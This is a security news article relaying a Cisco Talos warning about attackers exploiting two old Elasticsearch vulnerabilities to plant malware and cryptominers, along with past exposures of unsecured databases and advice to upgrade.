A large number of enterprises have been using Elasticsearch clusters in order to manage very large datasets and this tendency is luring cyber criminals into planting malware into unsecured Elacticsearch clusters to gain access to such datasets, Cisco Talos has warned.
In the recent past, a large number of Elasticsearch databases have been discovered by security researchers both in the United States and in Europe that stored very large amounts of data but were not secured by enterprises that owned such databases.
Unsecured Elasticsearch clusters exposed millions to hackers
For instance, in November last year, security researcher Bob Diachenko came across an unprotected database on the Elasticsearch server that contained detailed personal records of as many as 57 million U.S. citizens and another index of the same database contained 25 million additional data records.
A week prior to this discovery, Diachenko had unearthed another unprotected cloud database hosted by data aggregator Adapt that contained over 9.3 million data records, including personal data as well as job descriptions of millions of individuals.
The database contained as many as 9,376,173 personal data records that included first and last names, phone numbers, name of the companies where the individuals were employed, job titles, job descriptions, list of company domains, industry, company revenue, email confidence scores, total contacts available in the company, and emails of every contact in the company.
In January this year, Diachenko again discovered an Elasticsearch database that contained 51GB of confidential financial and banking data that could easily be used by any opportunistic cyber criminal to carry out identity fraud, file false tax returns, and avail loans and credit cards in the name of innocent citizens.
Considering that Elacticsearch databases managed by enterprises contain very large data sets of both customer and enterprise records, it is imperative for organisations to take all necessary steps to ensure the security of such clusters. The need for this is urgent as, according to Cisco Talos, there has been a spike in attacks from multiple threat actors targeting these clusters.
Version 1.4.2 and lower clusters vulnerable to attacks
The firm warned that cyber criminals are leveraging old vulnerabilities to pass scripts, to search queries, and to drop malware or cryptominers into Elasticsearch clusters belonging to versions 1.4.2 and lower. These vulnerabilities are known in security circles as CVE-2014-3120 and CVE-2015-1427.
"The most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms.
"Talos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners," the firm noted.
The firm added that in order to prevent malicious actors from exploiting CVE-2014-3120 and CVE-2015-1427 and injecting malware into their Elasticsearch clusters, enterprises must ensure that if they are using clusters that are versions 1.4.2 or lower, they should upgrade to a newer version. At the same time, enterprises should also disable the ability to send scripts through search queries if that ability is not strictly necessary for their use cases.